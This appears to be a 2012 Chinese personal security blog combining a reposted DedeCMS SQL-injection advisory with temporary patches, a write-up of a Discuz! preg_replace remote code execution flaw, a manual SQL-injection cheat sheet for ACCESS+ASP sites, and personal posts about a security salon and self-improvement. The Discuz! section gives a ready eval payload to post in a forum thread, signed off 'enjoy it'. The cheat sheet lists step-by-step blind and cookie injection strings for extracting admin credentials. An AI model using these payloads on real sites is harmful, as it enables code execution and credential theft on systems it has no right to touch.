TwoSilly's Blog

2012/4/29 凌晨 知道创宇安全研究团队截获到最新DEDECMS SQL注入 0day，官网目前提供下载的最新版5.7也受影响，截止本告警发出时官方尚未给出补丁或解决方案，此漏洞利用简单且dedecms安装之后默认即开启漏洞模块。

知道创宇给出三种临时解决方案：

方案一、临时补丁，需要四步

1. 确保您的magic_quotes_gpc = On

详细开启方式：打开php安装目录中的php.ini（若您使用的是appserv等集成环境，php.ini可能在系统盘符:\windows\php.ini），搜索magic_quotes_gpc，将其设置为On。

2.

/plus/carbuyaction.php 22行附近即

if($cfg_mb_open == 'N')
{
    ShowMsg("系统关闭了会员功能，因此你无法访问此页面！","javascript:;");
    exit();
}

下面添加一行代码

$rs =array();

3.

在 member/ajax_membergroup.php 33行附近即

if(empty($membergroup)){
    echo "您还没有设置分组！";
    exit;
}

下面加入如下代码：

if(strpos($membergroup,"'")){
    echo "SQL注入防护临时补丁，知道创宇安全团队提醒您关注官方补丁！";
    exit;
}

4.

原member/ajax_membergroup.php 36 行附近的

$row = $dsql->GetOne("SELECT groupname FROM #@__member_group WHERE mid = {$cfg_ml->M_ID} AND id={$membergroup}");

修改为

$row = $dsql->GetOne("SELECT groupname FROM #@__member_group WHERE mid = {$cfg_ml->M_ID} AND id='{$membergroup}'");

方案二、以网站管理员身份后台禁用会员功能

系统 -> 系统基本参数 -> 会员设置 -> 是否开启会员功能 改为（否）

方案三、若贵站不需要会员功能，可考虑直接重命名或删除存在漏洞的文件 /member/ajax_membergroup.php，最暴力却最有效的方式。

本文给出的临时补丁仅供临时防御，对系统造成轻微影响尚未进行系统测试，目前我们已经通知织梦CMS官方，具体补丁等请等待官方补丁。

乌云的链接：http://www.wooyun.org/bugs/wooyun-2012-06420

转自北北

过程简单说下，记的有点乱不贴太多代码了

diff一下看

@@ -4,7 +4,7 @@
  *      [Discuz!] (C)2001-2099 Comsenz Inc.
  *      This is NOT a freeware, use is subject to license terms
  *
- *      $Id: helper_seo.php 28028 2012-02-21 04:41:41Z chenmengshu $
+ *      $Id: helper_seo.php 29370 2012-04-09 04:39:11Z chenmengshu $
  */

 if(!defined('IN_DISCUZ')) {
@@ -89,7 +89,7 @@
}
}
if($searcharray && $replacearray) {
- $content = preg_replace("/(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|(\[attach\](\d+)\[\/attach\])/ies", 'helper_seo::base64_transform("encode", "<relatedlink>", "\\1\\2\\3", "</relatedlink>")', $content);
+ $content = preg_replace("/(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|(\[attach\](\d+)\[\/attach\])/ies", "helper_seo::base64_transform('encode', '<relatedlink>', '\\1\\2\\3', '</relatedlink>')", $content);
$content = preg_replace($searcharray, $replacearray, $content, 1);
$content = preg_replace("/<relatedlink>(.*?)<\/relatedlink>/ies", "helper_seo::base64_transform('decode', '', '\\1', '')", $content);
}
@@ -100,7 +100,7 @@

public static function base64_transform($type, $prefix, $string, $suffix) {
    if($type == 'encode') {
-      return $prefix.base64_encode(str_replace("\'", "'", $string)).$suffix;
+      return $prefix.base64_encode(str_replace("\\\"", "\"", $string)).$suffix;
} elseif($type == 'decode') {
       return $prefix.base64_decode($string).$suffix;
}

够清楚吧，问题在/source/class/helper/helper_seo.php 92行附近的：

$content = preg_replace("/(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|(\[attach\](\d+)\[\/attach\])/ies", 'helper_seo::base64_transform("encode", "<relatedlink>", "\\1\\2\\3", "</relatedlink>")', $content);

preg_replace 使用了e修正符，又是双引号，所以导致远程任意代码执行。

需要论坛支持个功能，啥功能看68行 $_G['cache']['relatedlink']，grep下relatedlink一路跟找到需要后台开个seo功能，详细代码不贴了自己看下，在运营-关联链接 /admin.php?frames=yes&action=misc&operation=relatedlink，且至少需要设置一个链接，这功能不是所有管理员都开，但是我觉得大部分都会开，如果不开，它就只能是个后台拿shell的tips了。

function_core.php 1925
function parse_related_link($content, $extent) {
return helper_seo::parse_related_link($content, $extent);
}

看正则

"/(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|(\[attach\](\d+)\[\/attach\])/ies"

那么利用方式还用说么？ 各种地方比如 source/include/space/space_blog.php，懂的都懂了

公司数据中心也在跑影响范围稍后会公布吧。

# ——- 2012/4/28 update ———

网上都有人发了，我也更新一下吧。

@峙酿君edwardz同学说：漏洞要开启seo，并且开启用户日志的seo，漏洞鸡肋，黑站就算了。

补充一下吧，开seo没错，但是并非他说的非得开日志的seo，我上面文章中说的 “各种地方比如 source/include/space/space_blog.php，懂的都懂了” 只是随便提个例子而已，其实在任何能够发表文章的地方都可以，最简单的，论坛找个板块发贴子就行，这主要看管理员开启了哪个位置的seo，如果不知道管理员开了哪的seo就到处都发一下。

利用方式也并非非得发blog，也不是非得发网络图片，详细的利用我是比如随便发个贴子，内容

${${eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))}}

然后给他加上任意超链接，发布即可phpinfo()，enjoy it

昨天下午参加了owasp-完美安全技术沙龙，也听了几位业界的大佬演讲的几个议题。

1、WEB前端安全 演讲嘉宾：余弦(知道创宇)
2、web应用防火墙 演讲嘉宾：safe3(360)
3、安全测试 演讲嘉宾：flashsky(翰海源)
4、数据安全的几道防线 演讲嘉宾：frank(安恒)
5、智能反钓鱼在犯罪追踪的应用 演讲嘉宾: 封初(瑞星)
6、浅谈登陆保护 演讲嘉宾: 弦(人人)
7、SNS社区之应用安全 演讲嘉宾:郑海鹏(新浪微博)

几位大佬的演讲很精彩，但是可能太高端了导致我听不懂….

主办方送了个鼠标垫，抽奖没那rp，但是完美的妹子没看到有点失望。

回来路上下雨了，我就当又送个免费沐浴。

《Python Hack》PPT下载：Python Hack

 

ACCESS+ASP结构网站渗透方法笔记 (通用注入法) Access数据库的标志，内置系统表：msysobjects and(select count(*) from msysobjects)>=0. 第一步：猜数据库名，看运气，用常用库名，如：admin； And exists(select * from 数据库表名) and (select count(*) from 数据库表名)>=0; 第二步：猜字段，通过表名猜出可能的字段如：admin user password pass adminuser username And exists(select 字段名 from 数据库表名) and (select 字段名 from 数据库表名)>=0 第三步：猜长度 And (select top 1 len(字段) from 数据库表名)>n and (select top 1 len(字段) from 表名 where 字段 not in (select top 1 字段 form 表名)) ….. 第四步：猜字段值 and (select top 1 asc(mid(字段名,1,1)) from 数据库表名)>n And(select top 1 asc(mid(字段名,1,1))from 表名 where 字段 not in(select top 1字段 from 表名)) 更换其中的红色字段就可以一个个猜解出字段的所有值。 And (select top 1 asc(mid,(字段名,1,1)) from admin ) 注：mid(字段,1,1):用法是从第1.2…个开始取1个字符长度. 技巧：当ASCII转换为负数时用 And (select top 1 abs(asc(mid(字段,1,1))) from 表名)=asc码 搜索型注入漏洞的处理: %’ and 1=1 and ’%’=’% %’ and 1=2 and ’%’=’% Cookie注入漏洞： 方法一：通过中转注入工具进行转换： 方法二：手工注入: 判断注入语句: Javascript:alert(document.cookie=”id=”+escape(“44 and 1=1″)); Javascript:alert(document.cookie=”id=”+escape(“44 and 1=2″)); 猜解语句: Javascript:alert(document.cookie=”id=”+escape(“44 and (select len(字段) from admin)=n”)) Javascript:alert(document.cookie=”id=”+escape(“44 and (select top 1 asc(mid(字段,1,1)) from admin)=n”))

闲下来给博客换了个模板，也把之前的文章基本都删了，原因是觉得写的东西没什么意义。

以后尽量侧重于写有意义的文章，让博客不再像个记事本一样乱糟糟的。

现在的每一天里，都感觉自己是在荒废青春。可是仔细想想以自己目前的水平今后能够得到一份什么样的工作？

恐怕答案只有我自己知道！所以我想给自己定个目标:通过未来几年的努力让自己生活的更好!

我不想为自己荒废的时间而感到后悔，况且我也没有多少时间可以荒废了。

说真的:我也受够了这种每天混吃等死的日子，甚至有时照着镜子看看自己都觉得非常可笑！像个小丑一样每天只知道吃喝享乐，而没有一点危机感。

我觉得人都是逼出来的，如果你不逼你自己你就感觉不到当今社会竞争的残酷。

一个每天沉醉在游戏中的人他是完全感受不到的，只有在你发现你甚至没有办法养活你自己时才恍然大悟，发现自己原来是那么可笑，同时觉得自己又十分可恨。

当你真正发现你竟连一份像样的工作都找不到，而你周围的朋友都有了一份满意的工作时，才觉得自己是那么的愚蠢。但是此时此刻后悔已经来不及。

所以奉劝自己：机会是自己把握的，不要让自己后悔！

之前一直对SEO颇有兴趣，但是由于自己比较抵触难得东西，在加上看了一些文章觉得SEO不想自己想像的那么简单，便导致我一直没有学SEO的想法。

但是在这段时间里却一直潜意识的逛一些SEO论坛，看一些SEO文章（虽然大多数是津津乐道的看人家的软文）但是对我还是有了一些想法。

于是这两天一直在找合适的教程，昨天下载的几个教程都是损坏的。但是我今天又继续找教程资源，因为试看了其中一节，觉得很有兴趣。找了三份教程，拼凑在一起。终于完整了。

今天一天看了足足4个小时的教程，断断续续。还记录了一堆课程中的要点。

虽然看的是09年录制的课程，但是还是看得我很激情。

以后有可能会对SEO有一些更深入的学习和实践。

昨天和一位大哥聊天也谈到互联网创业了，虽然现在创业的人很多。

但是成功的只是少数。我想如果把营销和SEO结合起来将会带来意想不到的结果。

盗用一句话:互联网创业不就是借鸡生蛋嘛。

行了不多扯了，节文。